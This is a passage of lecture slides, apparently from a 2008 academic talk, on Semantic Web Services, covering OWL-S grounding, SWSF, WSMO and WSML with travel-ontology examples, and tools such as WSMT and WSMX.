BPEL Composite Processes - Composite Processes specify how processes work together to compute a complex function - Composite processes define 1. **Control Flow** Specify the temporal relations between the executions of the different sub-processes (sequence, choice, etc.) 2. **Data Flow** Specify how the data produced by one process is transferred to another process Service Grounding - Service Grounding - Provides a specification of service access information. - Service Model + Grounding give everything needed for using the service - Builds upon **WSDL** to define message structure and physical binding layer - Specifies: - communication protocols, transport mechanisms, communication languages, etc. Mapping OWL-S / WSDL 1.1 - **Operations** - correspond to Atomic Processes - **Input/Output** - messages correspond to Inputs/Outputs of processes Result of using the Grounding - **Invocation mechanism for OWL-S** - Invocation based on WSDL - Different types of invocation supported by WSDL can be used with OWL-S - **Clear separation between service description and invocation/implementation** - Service description is needed to reason about the service - Decide how to use it - Decide what information to send and what to expect - Service implementation may be based on SOAP and XSD types - The crucial point is that the information that travels on the wires and the information used in the ontologies is the same - **Allows any web service to be represented using OWL-S** SWSF – Semantic Web Services Framework (SWSO + SWSL) - Based on OWL-S and PSL (Process Specification Language) - Richer behavioural process model based on PSL - Two major components: - conceptual model to specify ontologies, called SWSO, and - a richer language, called SWSL - Two variants of SWSL: - SWSL-FOL, based on FLOWS (First-order Logic Ontology for Web Services), - SWSL-Rules, based on ROWS (Rule Ontology for Web Services) - Submitted to W3C in 2005 - Standardized by ISO 18269 FLOWS Extensions based on PSL - Exceptions - Control constraints - Occurrence constraints - Ordering constraints - State constraints - FLOWS Core - PSL Outer Core WSMO - WSMO is an ontology and conceptual framework to describe Web services and related aspects - Based Web Service Modeling Framework (WSMF) - WSMO is a SDK-Cluster Working Group The WSMO approach for SWS - A Conceptual Model for SWS - A Formal Language for WSMO - An Execution Environment for WSMO **WSMO Principles** - **Web Compliance** - XML, URI (IRI), namespaces, but not necessarily RDF/S, OWL, ... - **Ontology-based & Role Separation** - Users exist in different contexts - **Strict Decoupling & Strong Mediation** - Autonomous components with mediators for interoperability - **Interface vs. Implementation** - Distinguish interface (= description) from implementation (=program) - WSML - **Execution Semantics** - WSMX - **Services vs Web Services** - A **Web service** is a computational entity which is able to achieve a user’s goal by invocation (e.g., sell books, sell air tickets) - A **service** is the actual value provided by this invocation --- **WSMO model in MOF** ``` MOF / \ meta-meta-model M3 layer / \ └── WSMO meta-model M2 layer / \ └── WSMO Descriptions model M1 layer / \ └── Concrete Web Services information M0 layer ``` WSMO Top Level Concepts Objectives that a client may have when consulting a Web Service Provide the formally specified terminology of the information used by all other components Connectors between components with mediation facilities for handling heterogeneities Semantic description of Web Services Non-Functional Properties - Every WSMO elements is described by properties that contain relevant, non-functional aspects of the item - used for management and element overall description - Core Properties: - Dublin Core Metadata Element Set plus version (evolution support) - W3C-recommendations for description type - Web Service Specific Properties: - quality aspects and other non-functional information of Web Services - used for Service Selection Non-Functional Properties ontologynp do#title hasValue "WSML example ontology" do#subject hasValue "family" do#description hasValue "fragments of a family ontology to provide WSML examples" do#contributor hasValue { _"http://homepage.uibk.ac.at/~c703240/foaf.rdf", _"http://homepage.uibk.ac.at/~csaa5569/", _"http://homepage.uibk.ac.at/~c703239/foaf.rdf", _"http://homepage.uibk.ac.at/homepage/~c703319/foaf.rdf" } do#date hasValue date("2004-11-22") do#format hasValue "text/plain" do#language hasValue "en-US" do#rights hasValue _"http://www.deri.org/privacy.html" wsml#version hasValue "$Revision: 1.13 $" end WSMO Ontologies Objectives that a client may have when consulting a Web Service Provide the formally specified terminology of the information used by all other components Connectors between components with mediation facilities for handling heterogeneities Semantic description of Web Services Ontology Example Ontology class Class ontology hasNonFunctionalProperty type nonFunctionalProperty importsOntology type ontology usesMediator type ooMediator hasConcept type concept hasRelation type relation hasFunction type function hasInstance type instance hasAxiom type axiom Ontology header wsmlVariant _"http://www.wsmo.org/wsml/wsml-syntax/wsml-flight“ namespace { _"http://www.inf.ufsc.br/~frank/travel/domainOntology#", dc _"http://purl.org/dc/elements/1.1#", wsml _"http://www.wsmo.org/wsml/wsml-syntax#" } ontology _"http://www.inf.ufsc.br/~frank/travel/domainOntology.wsml" nonFunctionalProperties dc#date hasValue _date(2008,10,8) dc#format hasValue "text/plain" dc#contributor hasValue {"Frank Siqueira", "Adina Sirbu", "Renato Fileto"} dc#title hasValue {"SBBD Travel Ontology", "Travel Ontology"} dc#language hasValue "en-US" endNonFunctionalProperties Concepts and relations concept Country subConceptOf Region name ofType _string capital impliesType (0 1) City concept City subConceptOf Region name ofType _string country ofType Country concept BrazilCity subConceptOf City concept Ticket from ofType Region to ofType Region vehicle ofType Vehicle ## Concepts and relations (cont.) - `concept Place` - `isInCity impliesType (0 1) City` - `concept Airport subConceptOf Place` - `concept BusStation subConceptOf Place` - `concept TrainStation subConceptOf Place` - `concept PersonsHome subConceptOf Place` - `concept UniversityCampus subConceptOf Place` ## Instances - `instance Brazil memberOf Country` - `name hasValue "Brazil"` - `capital hasValue Brasilia` - `instance SP memberOf BrazilState` - `name hasValue "São Paulo"` - `country hasValue Brazil` - `instance Brasilia memberOf BrazilCity` - `name hasValue "Brasília"` - `country hasValue Brazil` **Instances (cont.)** instance UNICAMP-BaraoGeraldo memberOf UniversityCampus isInCity hasValue Campinas instance UFSC_Trindade memberOf UniversityCampus isInCity hasValue Florianopolis instance HercilioLuz memberOf Airport isInCity hasValue Florianopolis instance Viracopos memberOf Airport isInCity hasValue Campinas instance Congonhas memberOf Airport isInCity hasValue SaoPaulo instance FrancoMontoro memberOf Airport isInCity hasValue Guarulhos **Axioms** axiom **UKCityDef** definedBy ?city memberOf UKCity implies ?city[country hasValue UK] axiom **BrazilCityDef** definedBy ?city memberOf BrazilCity implies ?city[country hasValue Brazil] **WSMO Goals** Objectives that a client may have when consulting a Web Service - **Goals** - **Ontologies** - **Mediators** - **Web Services** Semantic description of Web Services: - **Capability** (functional) - **Interfaces** (usage) Provide the formally specified terminology of the information used by all other components Connectors between components with mediation facilities for handling heterogeneities **Goal class** Class goal - hasNonFunctionalProperty type nonFunctionalProperty - importsOntology type ontology - usesMediator type {ooMediator, ggMediator} - requestsCapability type capability multiplicity = single–valued - requestsInterface type interface Goals - **De-coupling of Request and Service** - **Goal-driven Approach**, derived from AI rational agent approach - Requester formulates objective independent / without regard to services for resolution - ‘Intelligent’ mechanisms detect suitable services for solving the Goal - Allows re-use of Goals - **Usage of Goals within Semantic Web Services** - A Requester, that is an agent (human or machine), defines a Goal to be resolved - Web Service Discovery detects suitable Web Services for solving the Goal automatically - Goal Resolution Management is realized in implementations Goal Example ```xml wsmlVariant _"http://www.wsmo.org/wsml/wsml-syntax/wsml-flight" namespace {"_"http://www.inf.ufsc.br/~frank/travel/goalFloripaCampinasSBBD2008#", dO _"http://www.inf.ufsc.br/~frank/travel/domainOntology#", dc _"http://purl.org/dc/elements/1.1#" /* Test Goal */ goal _"http://www.inf.ufsc.br/~frank/travel/goalFloripaCampinasSBBD2008.wsml" nfp dc#title hasValue "Goal" dc#contributor hasValue "Frank Siqueira, Renato Fileto" dc#description hasValue "Buying a ticket from Floripa to Campinas" endnfp importsOntology _"http://www.inf.ufsc.br/~frank/travel/domainOntology.wsml" ``` Goal Example (cont) ``` capability goalCapability postcondition definedBy ?ticket[ dO#from hasValue ?from, dO#to hasValue ?to, dO#vehicle hasValue ?vehicle ] memberOf dO#Ticket and ?from = dO#Florianopolis and ?to = dO#Campinas. ``` WSMO Web Services Objectives that a client may have when consulting a Web Service - Semantic description of Web Services: - Capability (functional) - Interfaces (usage) Provide the formally specified terminology of the information used by all other components Connectors between components with mediation facilities for handling heterogeneities WSMO Service Class service hasNonFunctionalProperty type nonFunctionalProperty importsOntology type ontology usesMediator type \{ooMediator, wwMediator\} hasCapability type capability multiplicity = single-valued hasInterface type interface WSMO Web Service Non-functional Properties -> Capability Client Choreography Web Service Implementation (not of interest for Web Service Description) Orchestration WSMO Web Service - Interfaces - complete item description - quality aspects - Web Service Management Non-functional Properties Core + WS-specific Capability functional description Web Service Implementation (not of interest in Web Service Description) Realization of WS by using other Web Services - Functional decomposition - WS Composition Interaction Interface for consuming WS - Messages - External Visible Behavior - ‘Grounding’ Choreography --- Interfaces --- Orchestration Web Service specific Properties - non-functional information of Web Services: - Accuracy - Availability - Financial - Network-related QoS - Performance - Reliability - Robustness - Scalability - Security - Transactional - Trust Web Service Example wsmlVariant "http://www.wsmo.org/wsml/wsml-syntax/wsml-flight" namespace { _"http://www.inf.ufsc.br/~frank/travel/webServiceBrazilAir#", do _"http://www.inf.ufsc.br/~frank/travel/domainOntology#", dc _"http://purl.org/dc/elements/1.1#"} webService _"http://www.inf.ufsc.br/~frank/travel/webServiceBrazilAir.wsml" nonFunctionalProperties dc#description hasValue "Booking plane tickets within Brazil" dc#contributor hasValue "Frank Siqueira" dc#title hasValue "Brazil Air" endNonFunctionalProperties importsOntology _"http://www.inf.ufsc.br/~frank/travel/domainOntology.wsml" Web Service Example (cont.) capability webServiceBrazilAirCapability postcondition definedBy ?ticket[ do#from hasValue ?from, do#to hasValue ?to, do#vehicle hasValue ?vehicle ] memberOf do#Ticket and ?from memberOf do#BrazilCity and ?to memberOf do#BrazilCity and ?vehicle memberOf do#Airplane Goal-Services Matchmaking - **Service**: provision of value for some domain - **Abstract service**: collection of services offered by a provider - **Goal**: specification of the client needs - *E.g.: Booking air tickets from Floripa to Campinas and booking a room in a hotel in Campinas without carpet* - **Concrete services**: what the provider requires for accessing its services - *E.g. Persons’ name, features of the flight, features of the hotel room (maybe a picture)* - **Web service**: entity using standard interfaces that allow clients to interact with a provider, in order to explore and consume concrete services --- Heuristic Classification ``` Abstraction Matching Refinement | | | | Abstracted | Abstracted | | findings | diagnoses | | | | | Findings | Diagnosis | | | | ``` --- Services Discovery Process Possible kinds of matching - Exact Match - Plugin Match - Subsumption Match - Intersection Match - Non Match Goal Web service Ontological Coverage (Fileto et al. 2003) Consortium(RNA) Institution(Embrapa) Institution(Unicamp) ... Unit(CPAC) Unit(CNPTIA) ... Unit(CEPAGRI) ... Product ... Grain ... Coffee Beans Rice ... Robusta Arabica ... Variety(tupi) ... Grain ... Fruit ... Orange ... Mango ... Pera ... Variety(JAC-2000) [ Cons(RNA).Inst(Embrapa), Plant.Fruit.Orange, Country(Brazil).Region(SE) ] Region(SE) Country(Brazil) ... Region(NE) Region(S) Region(SE) ... State(MG) State(RJ) State(SP) ... [ Plant.Grain, Country(Brazil).Region(SE) ] Relating Ontological Coverages for Web Services Discovering Services providing data about the production of coffee in the Brazilian South-East? [ Plant, Country(Brazil) ] [ Plant, Country(Brazil).Region(SE) ] [ Plant, Country(Brazil).Region(NE) ] [ Plant, Country(Brazil).State(MG) ] [ Plant, Country(Brazil).State(SP) ] [ Plant, Country(Brazil).State(RJ) ] Web Service 1 Web Service 2 Web Service 3 Web Service 4 Web Service 5 ... Formal Relationships between Ontological Coverages Let OC = [ t₁, t₂, tₙ ], OC′ = [ t′₁, t′₂, t′ₙ ] be ontological coverages, where tᵢ, t′ᵢ are terms from the same ontology - **Overlapping** (reflexive, symmetric, transitive) - For all t in OC there exists t’ in OC’ such that - t encompasses t’ OR t’ encompasses t - For all t’ in OC’ there exists t in OC such that - t encompasses t’ OR t’ encompasses t - **Encompassing** (reflexive, transitive) - For all t in OC there exists t’ in OC’ such that t encompasses t’ - For all t’ in OC’ there exists t in OC such that t encompasses t’ - **Equivalence** (reflexive, symmetric, transitive) - For all t in OC there exists t’ in OC’ such that t encompasses t’ - For all t’ in OC’ there exists t in OC such that t’ encompasses t WSMO Capabilities/Interfaces - **Requested/provided:** - **Capability** (functional) - **Interfaces** (usage) Objectives that a client may have when consulting a Web Service Provide the formally specified terminology of the information used by all other components Connectors between components with mediation facilities addressing heterogeneities Semantic description of Web Services: Capability Specification - **Non functional properties** - **Imported Ontologies** - **Used mediators** - OO Mediator: importing ontologies as terminology definition - WG Mediator: link to a Goal that is solved by the Web Service - **Pre-conditions** What a web service expects in order to be able to provide its service. They define conditions over the input. - **Assumptions** Conditions on the state of the world that has to hold before the Web Service can be executed and work correctly, but not necessarily checked/checkable. - **Post-conditions** describes the result of the Web Service in relation to the input, and conditions on it. - **Effects** Conditions on the state of the world that hold after execution of the Web Service (i.e. changes in the state of the world) --- Web Service Interfaces **Choreography** - request: - buyer information, itinerary - input not valid - no valid connection - set of valid itineraries - itinerary - purchase proposition - option selection OR accept OR not accept - request payment information - payment information incorrect - payment information normal - successful purchase **Orchestration** - connection choice - contract of purchase - payment & delivery - successful purchase **Internal** - invocation - connection choice - contract of purchase - payment & delivery **TimeTable** - Composition - Payment - Delivery Choreography in WSMO "Interface of Web Service for client-service interaction when consuming the Web Service" - **External Visible Behavior** - those aspects of the workflow of a Web Service where User Interaction is required - described by process / workflow constructs - **Communication Structure** - messages sent and received - their order (messages are related to activities) --- Choreography in WSMO (2) - **Grounding** - concrete communication technology for interaction - choreography related errors (e.g. input wrong, message timeout, etc.) - **Formal Model** - allow operations / mediation on Choreographies - Formal Basis: Abstract State Machines (ASM) - Very generic description of a transition system over evolving ontologies: WSMO Orchestration "Achieve Web Service Functionality by aggregation of other Web Services" Decomposition of the Web Service functionality into sub functionalities Proxies: Goals as placeholders for used Web Services - **Orchestration Language** - decomposition of Web Service functionality - control structure for aggregation of Web Services - **Web Service Composition** - Combine Web Services into higher-level functionality - Resolve mismatches occurring between composed Web Services - **Proxy Technology** - Placeholders for used Web Services or goals, linked via Mediators. - Facility for applying the Choreography of used Web Services, service templates for composed services Choreography & orchestration **Example:** WSMO Mediators Objectives that a client may have when consulting a Web Service Provide the formally specified terminology of the information used by all other components Semantic description of Web Services: - Capability (functional) - Interfaces (usage) Mediators Connectors between components with mediation facilities for handling heterogeneities Mediation - Heterogeneity ... - Mismatches on structural / semantic / conceptual / level - Occur between different components that shall interoperate - Especially in distributed & open environments like the Internet - Concept of Mediation (Wiederhold, 94): - Mediators as components that resolve mismatches - Declarative Approach: - Semantic description of resources - 'Intelligent' mechanisms that resolve mismatches independent of content - Mediation cannot be fully automated (integration decision) - Levels of Mediation within Semantic Web Services (WSMF): - Data Level: mediate heterogeneous Data Sources - Protocol Level: mediate heterogeneous Communication Patterns - Process Level: mediate heterogeneous Business Processes Mediation Techniques heterogeneity resolution Components connect heterogeneous elements + use mediation techniques apply WW Mediator WG Mediator GG Mediator OO Mediator invocation & execution Mediation Execution Environment Mediator Usage Legend: - Modelling Element - Logical connection Mediators as services 10/11/2008 WSMO Mediator uses a Mediation Service via - as a Goal - directly - optionally incl. Mediation Source Component Source Component Target Component Mediation Services Process Mediation Patterns (a) (b) (c) (d) Example of Process Mediation WSMO Perspective - WSMO provides a **conceptual model** for Web Services and related aspects - WSMO separates the different **language specifications layers** (MOF style) - Language for defining WSMO is the meta - meta - model in MOF - WSMO and WSML are the meta - models in MOF - Actual goals, web services, etc. are the model layer in MOF - Actual data described by ontologies and exchanged is the information layer in MOF - Stress on solving the integration problem - Mediation as a key element - Languages to cover wide range of scenarios and improve interoperability - Relation to industry WS standards - All the way from conceptual modelling to usable implementation (WSML, WSMX) - Language: WSML: human readable syntax, XML exchange syntax, RDF/XML exchange syntax under consideration **WSML** **Key features:** - One syntactic framework for a set of layered languages - Normative, human-readable syntax - Separation of conceptual and logical modeling - Semantics based on well-known formalisms - WWW language - Frame-based syntax **WSML vs OWL** The relation between WSML and OWL+SWRL is still to be completely worked out: - WSML-Core is a subset of OWL Lite (DL À Datalog) - WSML-DL is equivalent to OWL DL - WSML-Flight (refers to "F-Logic" and "Light" ;-) and extends to the LP variant of F-Logic) but for other languages the relation is still unknown. **WSML Variants** - WSML-DL (With nonmonotonic extensions) - WSML-Core - WSML-Flight - F-Logic - DataLog - Horn - WSML-Flight (With nonmonotonic negation) - WSML-Rule - First-Order Logic (Without NAF) - WSML-Full - First-Order Logic (Without EXISTS) **WSML Layering** - WSML-Full - WSML-DL - WSML-Rule - WSML-Flight - WSML-Core - First-Order Logic - Logic Programming - Description Logics ### Relation to Web Services Technology <table> <thead> <tr> <th></th> <th>OWL-S</th> <th>WSMO</th> <th>Web Services Infrastructure</th> </tr> </thead> <tbody> <tr> <td><strong>Discovery</strong></td> <td></td> <td></td> <td></td> </tr> <tr> <td>What it does</td> <td>Profile</td> <td>Web Services (capability)</td> <td>UDDI API</td> </tr> <tr> <td><strong>Choreography</strong></td> <td></td> <td></td> <td></td> </tr> <tr> <td>How is done</td> <td>Process Model</td> <td>Orchestration + choreography</td> <td>BPEL4WS</td> </tr> <tr> <td><strong>Invocation</strong></td> <td></td> <td></td> <td></td> </tr> <tr> <td>How to invoke</td> <td>Grounding+ WSDL/SOAP</td> <td>Grounding</td> <td>WSDL/SOAP</td> </tr> </tbody> </table> - OWL-S and WSMO map to UDDI API adding semantic annotation - OWL-S and WSMO share a default WSDL/SOAP Grounding - BPEL4WS could be mapped into WSMO orchestration and choreography - Mapping still unclear at the level of choreography/orchestration - In OWL-S, multi-party interaction is obtained through automatic composition and invocation of multiple parties - BPEL allows hardcoded representation of many Web services in the same specification - Trade-off: OWL-S support substitution of Web services at run time, such substitution is virtually impossible in BPEL. ### Conclusion: How WSMO Addresses WS problems - **Discovery** - Provide formal representation of capabilities and goal - Conceptual model for service discovery - Different approaches to web service discovery - **Composition** - Provide formal representation of capabilities and choreographies - **Invocation** - Support any type of WS invocation mechanism - Clear separation between WS description and implementation - **Mediation and Interoperation** - Mediators as a key conceptual element - Mediation mechanism not dictated - (Multiple) formal choreographies + mediation enable interoperation - **Guaranteeing Security and Policies** - No explicit policy and security specification yet - Proposed solution will interoperate with WS standards - The solutions are envisioned maintaining a strong relation with existing WS standards Topics - Introduction - Web Services (WS) - Semantic Web (SW) - Semantic Web Services (SWS) - Some Major Efforts towards SWS - WSDL-S - OWL-S - SWSF (SWSO + SWSL) - WSMO (WSMO + WSML + WSMX) **Software Tools:** WSMT, WSMX, IRS-III, ... - Case study: Travelling to SBBD Software Tools for SWS - Design Tools - WSMT (Eclipse, WSMO API, WSMO-Studio, WSMT, DOME) - Execution Environments - WSMX - Reasoners - WSML-2 Reasoner - IRS-III WSMT WSMT: graph based editing, integration of execution environments WSMOStudio: form based editing, support for choreographies DOME: tree based editing, support for versioning & distribution Eclipse Platform WSMO API WSMX Architecture **WSML2REasoner Framework** - **Reasoning Request** - **Result (Variable bindings)** - **WSML Reasoner Interface** - **Normalization Steps** - **Datalog Layer** - **Symbol Map** - **MINS Facade** - **KAON2 Facade** - **...** - **MINS** - **KAON2** - **...** **Topics** - **Introduction** - **Web Services (WS)** - **Semantic Web (SW)** - **Semantic Web Services (SWS)** - **Some Major Efforts towards SWS** - WSDL-S - OWL-S - SWSF (SWSO + SWSL) - WSMO (WSMO + WSML + WSMX) - **Software Tools:** WSMT, WSMX, IRS-III, ... - **Case study: Travelling to SBBD** Case Study: Virtual Travel Agency SBBD Travelling Ontology Queries - ?city[country hasValue Brasil] - ?city memberOf BrazilCity - ?country[capital hasValue ?capital] - ?country[capital hasValue ?capital] and ?capital memberOf EUcity - ?country[capital hasValue ?capital] and ?city[country hasValue ?country] and ?capital != ?city Query execution WSMT Perspectives and Navigator Other Travel Ontologies III Mediation Services Web Service BrazilAir capability webServiceBrazilAirCapability postcondition definedBy ?ticket[ dO#from hasValue ?from, dO#to hasValue ?to, dO#vehicle hasValue ?vehicle ] memberOf dO#Ticket and ?from memberOf dO#BrazilCity and ?to memberOf dO#BrazilCity and ?vehicle memberOf dO#Airplane Goal FLP-CPS http://www.inf.ufsc.br/~frank/travel/goalFlorianopolisCampinasSEBD2008.w3wl Goal Florianópolis-Campinas capability goalCapability postcondition definedBy ?ticket[ dO#from hasValue ?from, dO#to hasValue ?to, dO#vehicle hasValue ?vehicle ] memberOf dO#Ticket and ?from = dO#Florianopolis and ?to = dO#Campinas. **Discovered Web Services FLP-CPS** ![WSMX Monitor interface](image) **Problem!** Current WSMO version does not properly support inference on instances? --- **Goal BrazilAir** ``` capability goalCapability postcondition definedBy ?ticket[ dO#from hasValue ?from, dO#to hasValue ?to, dO#vehicle hasValue ?vehicle ] memberOf dO#Ticket and ?from memberOf dO#BrazilCity and ?to memberOf dO#BrazilCity ?vehicle memberOf dO#Airplane ``` Discovered Web Services BrazilAir Goal EUAir capability goal postcondition definedBy ?ticket[ dO#from hasValue ?from, dO#to hasValue ?to, dO#vehicle hasValue ?vehicle ] memberOf dO#Ticket and ?fro memberOf dO#EUCity and ?to memberOf dO#EUCity Discovered Web Services EUAir Conclusions - SWS research mixes lots of theory and technology - Current Web services technology (WSDL, SOAP, UDDI, ...) - Semantic Web technology - Sophisticated knowledge representation and reasoning - Process/workflow technology (orchestration and choreography) - Some R&D opportunities/challenges in SWS - Automated composition of SWS - Domain specific issues - Software tools for SWS References – SWS in general References – SWS major approaches References - SWS Composition Thanks all folks! Questions? Suggestions? Comments? Complaints?
{"Source-Url": "http://www.inf.ufsc.br/~r.fileto/Talks/SWS-SBBD-SECCOM-2008.pdf", "len_cl100k_base": 16279, "olmocr-version": "0.1.53", "pdf-total-pages": 99, "total-fallback-pages": 0, "total-input-tokens": 135581, "total-output-tokens": 21916, "length": "2e13", "weborganizer": {"__label__adult": 0.000370025634765625, "__label__art_design": 0.0011205673217773438, "__label__crime_law": 0.00043702125549316406, "__label__education_jobs": 0.0019989013671875, "__label__entertainment": 0.0002257823944091797, "__label__fashion_beauty": 0.0001780986785888672, "__label__finance_business": 0.0008749961853027344, "__label__food_dining": 0.00032591819763183594, "__label__games": 0.0008664131164550781, "__label__hardware": 0.0008974075317382812, "__label__health": 0.0003631114959716797, "__label__history": 0.0006494522094726562, "__label__home_hobbies": 0.00011652708053588869, "__label__industrial": 0.0004551410675048828, "__label__literature": 0.000904083251953125, "__label__politics": 0.0003826618194580078, "__label__religion": 0.0006527900695800781, "__label__science_tech": 0.09332275390625, "__label__social_life": 0.00020134449005126953, "__label__software": 0.052978515625, "__label__software_dev": 0.841796875, "__label__sports_fitness": 0.0002598762512207031, "__label__transportation": 0.0005764961242675781, "__label__travel": 0.0002918243408203125}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 65125, 0.00846]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 65125, 0.16599]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 65125, 0.64921]], "google_gemma-3-12b-it_contains_pii": [[0, 487, false], [487, 1145, null], [1145, 1809, null], [1809, 2279, null], [2279, 2686, null], [2686, 3194, null], [3194, 3635, null], [3635, 4380, null], [4380, 4786, null], [4786, 5322, null], [5322, 6545, null], [6545, 7209, null], [7209, 8460, null], [8460, 9078, null], [9078, 9415, null], [9415, 10256, null], [10256, 10865, null], [10865, 11529, null], [11529, 11893, null], [11893, 12962, null], [12962, 13556, null], [13556, 15098, null], [15098, 15750, null], [15750, 16165, null], [16165, 17394, null], [17394, 17753, null], [17753, 18219, null], [18219, 19021, null], [19021, 19905, null], [19905, 20167, null], [20167, 21090, null], [21090, 21870, null], [21870, 22464, null], [22464, 23188, null], [23188, 23842, null], [23842, 24656, null], [24656, 25519, null], [25519, 26044, null], [26044, 26594, null], [26594, 27297, null], [27297, 27613, null], [27613, 27890, null], [27890, 28236, null], [28236, 28925, null], [28925, 29913, null], [29913, 30849, null], [30849, 31362, null], [31362, 32096, null], [32096, 33066, null], [33066, 34481, null], [34481, 35053, null], [35053, 35780, null], [35780, 36583, null], [36583, 37246, null], [37246, 37550, null], [37550, 38539, null], [38539, 39306, null], [39306, 40219, null], [40219, 40501, null], [40501, 41424, null], [41424, 42053, null], [42053, 42763, null], [42763, 43440, null], [43440, 44663, null], [44663, 45271, null], [45271, 45701, null], [45701, 46442, null], [46442, 47398, null], [47398, 48437, null], [48437, 48593, null], [48593, 49566, null], [49566, 50760, null], [50760, 52186, null], [52186, 52950, null], [52950, 53696, null], [53696, 54812, null], [54812, 55108, null], [55108, 55359, null], [55359, 56214, null], [56214, 56791, null], [56791, 57183, null], [57183, 59225, null], [59225, 59679, null], [59679, 59903, null], [59903, 59921, null], [59921, 59921, null], [59921, 60492, null], [60492, 60552, null], [60552, 60841, null], [60841, 60873, null], [60873, 60873, null], [60873, 60912, null], [60912, 61219, null], [61219, 61551, null], [61551, 62009, null], [62009, 62261, null], [62261, 62697, null], [62697, 64259, null], [64259, 65125, null]], "google_gemma-3-12b-it_is_public_document": [[0, 487, true], [487, 1145, null], [1145, 1809, null], [1809, 2279, null], [2279, 2686, null], [2686, 3194, null], [3194, 3635, null], [3635, 4380, null], [4380, 4786, null], [4786, 5322, null], [5322, 6545, null], [6545, 7209, null], [7209, 8460, null], [8460, 9078, null], [9078, 9415, null], [9415, 10256, null], [10256, 10865, null], [10865, 11529, null], [11529, 11893, null], [11893, 12962, null], [12962, 13556, null], [13556, 15098, null], [15098, 15750, null], [15750, 16165, null], [16165, 17394, null], [17394, 17753, null], [17753, 18219, null], [18219, 19021, null], [19021, 19905, null], [19905, 20167, null], [20167, 21090, null], [21090, 21870, null], [21870, 22464, null], [22464, 23188, null], [23188, 23842, null], [23842, 24656, null], [24656, 25519, null], [25519, 26044, null], [26044, 26594, null], [26594, 27297, null], [27297, 27613, null], [27613, 27890, null], [27890, 28236, null], [28236, 28925, null], [28925, 29913, null], [29913, 30849, null], [30849, 31362, null], [31362, 32096, null], [32096, 33066, null], [33066, 34481, null], [34481, 35053, null], [35053, 35780, null], [35780, 36583, null], [36583, 37246, null], [37246, 37550, null], [37550, 38539, null], [38539, 39306, null], [39306, 40219, null], [40219, 40501, null], [40501, 41424, null], [41424, 42053, null], [42053, 42763, null], [42763, 43440, null], [43440, 44663, null], [44663, 45271, null], [45271, 45701, null], [45701, 46442, null], [46442, 47398, null], [47398, 48437, null], [48437, 48593, null], [48593, 49566, null], [49566, 50760, null], [50760, 52186, null], [52186, 52950, null], [52950, 53696, null], [53696, 54812, null], [54812, 55108, null], [55108, 55359, null], [55359, 56214, null], [56214, 56791, null], [56791, 57183, null], [57183, 59225, null], [59225, 59679, null], [59679, 59903, null], [59903, 59921, null], [59921, 59921, null], [59921, 60492, null], [60492, 60552, null], [60552, 60841, null], [60841, 60873, null], [60873, 60873, null], [60873, 60912, null], [60912, 61219, null], [61219, 61551, null], [61551, 62009, null], [62009, 62261, null], [62261, 62697, null], [62697, 64259, null], [64259, 65125, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 65125, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 65125, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 65125, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 65125, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 65125, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 65125, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 65125, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 65125, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 65125, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 65125, null]], "pdf_page_numbers": [[0, 487, 1], [487, 1145, 2], [1145, 1809, 3], [1809, 2279, 4], [2279, 2686, 5], [2686, 3194, 6], [3194, 3635, 7], [3635, 4380, 8], [4380, 4786, 9], [4786, 5322, 10], [5322, 6545, 11], [6545, 7209, 12], [7209, 8460, 13], [8460, 9078, 14], [9078, 9415, 15], [9415, 10256, 16], [10256, 10865, 17], [10865, 11529, 18], [11529, 11893, 19], [11893, 12962, 20], [12962, 13556, 21], [13556, 15098, 22], [15098, 15750, 23], [15750, 16165, 24], [16165, 17394, 25], [17394, 17753, 26], [17753, 18219, 27], [18219, 19021, 28], [19021, 19905, 29], [19905, 20167, 30], [20167, 21090, 31], [21090, 21870, 32], [21870, 22464, 33], [22464, 23188, 34], [23188, 23842, 35], [23842, 24656, 36], [24656, 25519, 37], [25519, 26044, 38], [26044, 26594, 39], [26594, 27297, 40], [27297, 27613, 41], [27613, 27890, 42], [27890, 28236, 43], [28236, 28925, 44], [28925, 29913, 45], [29913, 30849, 46], [30849, 31362, 47], [31362, 32096, 48], [32096, 33066, 49], [33066, 34481, 50], [34481, 35053, 51], [35053, 35780, 52], [35780, 36583, 53], [36583, 37246, 54], [37246, 37550, 55], [37550, 38539, 56], [38539, 39306, 57], [39306, 40219, 58], [40219, 40501, 59], [40501, 41424, 60], [41424, 42053, 61], [42053, 42763, 62], [42763, 43440, 63], [43440, 44663, 64], [44663, 45271, 65], [45271, 45701, 66], [45701, 46442, 67], [46442, 47398, 68], [47398, 48437, 69], [48437, 48593, 70], [48593, 49566, 71], [49566, 50760, 72], [50760, 52186, 73], [52186, 52950, 74], [52950, 53696, 75], [53696, 54812, 76], [54812, 55108, 77], [55108, 55359, 78], [55359, 56214, 79], [56214, 56791, 80], [56791, 57183, 81], [57183, 59225, 82], [59225, 59679, 83], [59679, 59903, 84], [59903, 59921, 85], [59921, 59921, 86], [59921, 60492, 87], [60492, 60552, 88], [60552, 60841, 89], [60841, 60873, 90], [60873, 60873, 91], [60873, 60912, 92], [60912, 61219, 93], [61219, 61551, 94], [61551, 62009, 95], [62009, 62261, 96], [62261, 62697, 97], [62697, 64259, 98], [64259, 65125, 99]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 65125, 0.01135]]}
olmocr_science_pdfs
2024-12-10
2024-12-10
7b7a1d48bcab4f88c07766b39a77ee89232d3aee
